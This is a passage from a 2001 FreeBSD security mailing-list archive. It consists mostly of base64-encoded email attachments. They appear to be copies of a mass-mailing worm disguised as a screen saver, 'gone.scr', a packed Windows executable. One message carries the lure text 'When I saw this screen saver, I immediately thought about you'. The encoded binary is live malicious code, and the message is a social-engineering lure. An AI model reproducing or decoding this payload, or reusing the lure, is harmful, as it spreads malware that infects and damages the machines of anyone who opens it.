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
AAAAAAADAAMAAAAoAACADgAAAGgAAIAQAAAAqAAAgAAAAADVRQo8AAAAAAAAAQAxdQAAQAAAgAAA
AADVRQo8AAAAAAAAAQAAAAAAWAAAAOxQAgCoDgAAsAQAAAAAAAAAAAAA1UUKPAAAAAAAAAEAAQAA
AIAAAIAAAAAA1UUKPAAAAAAAAAEAAAAAAJgAAACYXwIAFAAAALAEAAAAAAAAAAAAANVFCjwAAAAA
AAABAAEAAADAAACAAAAAANVFCjwAAAAAAAABAAkEAADYAAAAsF8CADQCAACwBAAAAAAAADgTAgAo
AAAAMAAAAGAAAAABAAgAAAAAAIAKAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAgAAAgAAAAICAAIAA
AACAAIAAgIAAAMDAwADA3MAA8MqmANTw/wCx4v8AjtT/AGvG/wBIuP8AJar/AACq/wAAktwAAHq5
AABilgAASnMAADJQANTj/wCxx/8Ajqv/AGuP/wBIc/8AJVf/AABV/wAASdwAAD25AAAxlgAAJXMA
ABlQANTU/wCxsf8Ajo7/AGtr/wBISP8AJSX/AAAA/gAAANwAAAC5AAAAlgAAAHMAAABQAOPU/wDH
sf8Aq47/AI9r/wBzSP8AVyX/AFUA/wBJANwAPQC5ADEAlgAlAHMAGQBQAPDU/wDisf8A1I7/AMZr
/wC4SP8AqiX/AKoA/wCSANwAegC5AGIAlgBKAHMAMgBQAP/U/wD/sf8A/47/AP9r/wD/SP8A/yX/
AP4A/gDcANwAuQC5AJYAlgBzAHMAUABQAP/U8AD/seIA/47UAP9rxgD/SLgA/yWqAP8AqgDcAJIA
uQB6AJYAYgBzAEoAUAAyAP/U4wD/sccA/46rAP9rjwD/SHMA/yVXAP8AVQDcAEkAuQA9AJYAMQBz
ACUAUAAZAP/U1AD/sbEA/46OAP9rawD/SEgA/yUlAP4AAADcAAAAuQAAAJYAAABzAAAAUAAAAP/j
1AD/x7EA/6uOAP+PawD/c0gA/1clAP9VAADcSQAAuT0AAJYxAABzJQAAUBkAAP/w1AD/4rEA/9SO
AP/GawD/uEgA/6olAP+qAADckgAAuXoAAJZiAABzSgAAUDIAAP//1AD//7EA//+OAP//awD//0gA
//8lAP7+AADc3AAAubkAAJaWAABzcwAAUFAAAPD/1ADi/7EA1P+OAMb/awC4/0gAqv8lAKr/AACS
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
eXl5eHh5gHVpgYGBaWlpaYFpdXV0BAR0f213goMJCYODgoKCjo6OjoMAAAAAeXl5eXl4eHhtaHWB
aWmBaWlpaXVpaXQEdHSA8HiCdgkJg4OCgoKDgo6Og4MAAAAAeXl5eXl5eHjtgHV1aWmBaWlpdWlp
aXQEdHRneHZ2dwmDgoKCgoKDgoKCg4QAAAAAeXl5eXl4eHh5jHWBaYFpaWl1dWmBaXR0dATvdnZ3
CYOCg4ODgo6OgoJ2g4QAAAAAeXl5eXl5eHh5jIGBgYGBgYFpaWl0dAQEdGdrjnYJCYODg4OCj4+P
goKDhHgAAAAAeXl5eXl5eXh4i4F1gYGBgYFpgXV0dHR0BGdggoIJCXeDg4OCj4+Oj4N3hHgAAAAA
eXl5eXl5eXh4eYuBdWmBgWlpgWlpdAQEdGdggnYJCYODg4OCgo+OjoMJhIQAAAAAeXl5eXl5eXh4
eHmAdWmBgWlpgWlpdAR0dGd4gmoJd4ODg4OCgoKCgoODd4QAAAAAeXl5eXl5eXl4d3l/dXWBgYFp
aYGBdHR0BGd4dnZ3d3d3g4ODgoKDg4ODg3cAAAAAeXl5eXl5eXl4a3l/dHVpaWlpaWh0dGh0dGZr
dnZ3CQl3d4ODg4ODg4N3g4MAAAAAeW16eXl5eXl4a3h6gHWBdHR0dHR0BAR0aG1qgmoJCQkJd4OD
g4ODg4ODg3cAAAAAeXp6eXl5eXl4eHh5boB1dIAEBARzcwR0f2x2ancJCQl3d4ODg4ODg4MJg3cA
AAAAeXp6eXl5eXl5bHhrbGeAdARzc3Nzc3R/bHd3CQkJCQl3d3eDg4ODg3d3CQkAAAAAbXp6eXl5
eXl5eWx4eHl6f3Nzc3Nzf20Jg3cJCQkJCXd3d3d3d3d3d3d3dwkAAAAAbXp6bXl5eXl5eXl5bHhs
eW1tbXlteXh4eAl4d3eEhIR3hISEhHd3d3d3g4QAAAAAbW16bW15eXl5eXl5bHh5eXh4eHl4eHh4
d3d4CXd3dwmEhAmEhHeEhIQJd4QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAP//AAAAAAAA//8AAAAAAAD//wAAAAAAAP//AAAAAAAA//8AAAAAAAD//wAAAAAA
AP//AAAAAAAA//8AAAAAAAD//wAAAAAAAP//AAAAAAAA//8AAAAAAAD//wAAAAAAAP//AAAAAAAA
//8AAAAAAAD//wAAAAAAAP//AAAAAAAA//8AAAAAAAD//wAAAAAAAP//AAAAAAAA//8AAAAAAAD/
/wAAAAAAAP//AAAAAAAA//8AAAAAAAD//wAAAAAAAP//AAAAAAAA//8AAAAAAAD//wAAAAAAAP//
AAAAAAAA//8AAAAAAAD//wAAAAAAAP//AAAAAAAA//8AAAAAAAD//wAAAAAAAP//AAAAAAAA//8A
AAAAAAD//wAAAAAAAP//AAAAAAAA//8AAAAAAAD//wAAAAAAAP//AAAAAAAA//8AAAAAAAD//wAA
AAAAAP//AAAAAAAA//8AAAAAAAD//wAAAAAAAP//AAAAAAAA//8AAAAAAAD//yQTAgAAAAEAAQAw
MAAAAQAIAKgOAAAxdfAQAgA0AjQAAABWAFMAXwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAA
vQTv/gAAAQAAAAAAAwAAAAAAAAADAAAAAAAAAAAAAAAEAAAAAQAAAAAAAAAAAAAAAAAAAEQAAAAA
AFYAYQByAEYAaQBsAGUASQBuAGYAbwAAAAAAJAAEAAAAVAByAGEAbgBzAGwAYQB0AGkAbwBuAAAA
AAAJBLAElAEAAAEAUwB0AHIAaQBuAGcARgBpAGwAZQBJAG4AZgBvAAAAcAEAAAEAMAA0ADAAOQAw
ADQAQgAwAAAAUAA2AAEAQwBvAG0AbQBlAG4AdABzAAAAUABvAHcAZQByACAAUAB1AGYAZgAgAGcA
aQByAGwAcwAgAHIAdQBsAHoAIQAgACAAOwA+AAAAAAA0ABQAAQBQAHIAbwBkAHUAYwB0AE4AYQBt
AGUAAAAAAHAAZQBuAHQAYQBnAG8AbgBlAAAANAAUAAEARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAA
AAAwAC4AMAAwAC4AMAAwADAAMwAAADgAFAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAA
ADAALgAwADAALgAwADAAMAAzAAAALAAKAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAABnAG8A
bgBlAAAAAAA8ABIAAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBuAGEAbQBlAAAAZwBvAG4AZQAu
AHMAYwByAAAAAAAAAAAAAAAAAAAAAAA4YgIAIGICAAAAAAAAAAAAAAAAAEViAgAwYgIAAAAAAAAA
AAAAAAAAAAAAAAAAAABSYgIAYGICAHBiAgAAAAAARQIAgAAAAABLRVJORUwzMi5ETEwATVNWQlZN
NjAuRExMAAAATG9hZExpYnJhcnlBAABHZXRQcm9jQWRkcmVzcwAARXhpdFByb2Nlc3MAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=

------_=_NextPart_000_01C17D09.67187BC0--

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4 13:56:24 2001
Delivered-To: freebsd-security@freebsd.org
Received: from highland.isltd.insignia.com (highland.isltd.insignia.com [195.74.141.1])
	by hub.freebsd.org (Postfix) with ESMTP id 0377A37B417
	for <freebsd-security@freebsd.org>; Tue,  4 Dec 2001 13:50:36 -0800 (PST)
Received: from wolf.isltd.insignia.com (wolf.isltd.insignia.com [172.16.1.3])
	by highland.isltd.insignia.com (8.11.3/8.11.3/check_local4.2) with ESMTP id fB4LoYg06358
	for <freebsd-security@freebsd.org>; Tue, 4 Dec 2001 21:50:34 GMT
Received: (from news@localhost)
	by wolf.isltd.insignia.com (8.9.3/8.9.3) id VAA11651
	for freebsd-security@freebsd.org; Tue, 4 Dec 2001 21:50:33 GMT
From: "Baldwin, Peter" <freebsd-security-local@insignia.com>
To: "local.freebsd.security" <local.freebsd.security@insignia.com>
Subject: Hi
Date: Tue, 4 Dec 2001 13:17:57 -0800
Message-ID: <F098252D3EC7D21191DB00A0C9337ECBE039D0@exchange-us.isinc.insignia.com>
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="----_=_NextPart_000_01C17D09.257421B0"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_000_01C17D09.257421B0
Content-Type: text/plain

How are you ?
When I saw this screen saver, I immediately thought about you
I am in a harry, I promise you will love it!


------_=_NextPart_000_01C17D09.257421B0
Content-Type: application/octet-stream;
	name="gone.scr"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
	filename="gone.scr"

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAyAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
